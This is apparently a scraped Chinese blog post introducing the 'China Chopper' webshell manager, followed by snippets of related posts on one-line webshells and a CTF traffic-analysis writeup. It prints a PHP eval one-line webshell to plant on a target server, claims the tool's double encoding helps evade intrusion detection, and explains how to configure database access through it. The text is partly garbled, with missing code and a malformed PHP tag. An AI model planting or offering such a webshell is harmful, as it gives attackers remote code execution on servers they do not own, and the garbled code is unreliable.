中國菜刀使用介紹

2021-10-01 06:20:33 字數 1029 閱讀 7857

一、簡介

伺服器只需要簡單的一行**,即可用此程式實現常用的管理功能,功能**二次編碼後傳送,過ids的能力大幅提高。

目前支援的服務端指令碼:php、asp、.net,並且支援、https安全連線的**

在伺服器端執行的**如下:

php:<?php @eval($_post['pass'];?)>

asp:

asp.net:

二、用法三、配置資訊填寫

1. 資料庫方面

php指令碼:

型別 型別可以為mysql、mssql、orcle、infomix中的一種

主機位址 主機位址可以為機器名或ip位址,如localhost

資料庫使用者 連線資料庫的使用者名稱

資料庫密碼

連線資料庫的密碼 示例: ![在這裡插入描述](

asp和asp.net指令碼:

型別 型別只能填ado

ado配置資訊

ado連線各種資料庫的方式不一樣,如mssql的配置資訊為:

driver=; server=(local); database=master;uid=sa;pwd=123456;同時,支援nt驗證登入mssql資料庫,並把雜湊的結果列表匯出為html檔案

customize指令碼:

型別 型別只能填xdb

與customize指令碼約定的配置資訊

四、其他功能

1.爬蟲功能

2. 一句話木馬功能

具體操作見文章所示

中國菜刀的使用

中國菜刀的使用,為自己和新手一起分享的。大牛看了勿噴!說到菜刀,我們第一想到的是一句話了。這裡就說說一句話的型別,常常有的asp,aspx,php。asp一句話 aspx一句話 php一句話 這裡寫的只是常見的,在各個型別中還衍生了許多的變種一句話,我們在使用的時候,更改裡面的 pass 就可以了,...

bugku 中國菜刀 writeup

自己真的是很愚笨,參考了很多,才終於了解了。用 wireshark 寫的 也參考了很多大神的寫法 也有位大佬補充了一點 但考慮可能小白真的白 比如我 所以根據自己的思路再補充一點 做這個真的有點抓狂了,所以想補充 用wireshark開啟之後直接拉到最下面,有個http包,右擊 追蹤流 http 這...

中國菜刀執行過程

對於玩滲透的人來說 一句話 中國菜刀 肯定不陌生 那麼菜刀到底是怎麼樣判斷他的密碼呢?如何列目錄的呢?我們一一來進行科普下。一句話 這是php的一句話密碼。不懂的人來說 這怎麼樣是木馬呢?這明明是正常的php語法。別著急,慢慢講解。上面的一句話是服務端 也就是說 他等待post提交變數名 的資料 現...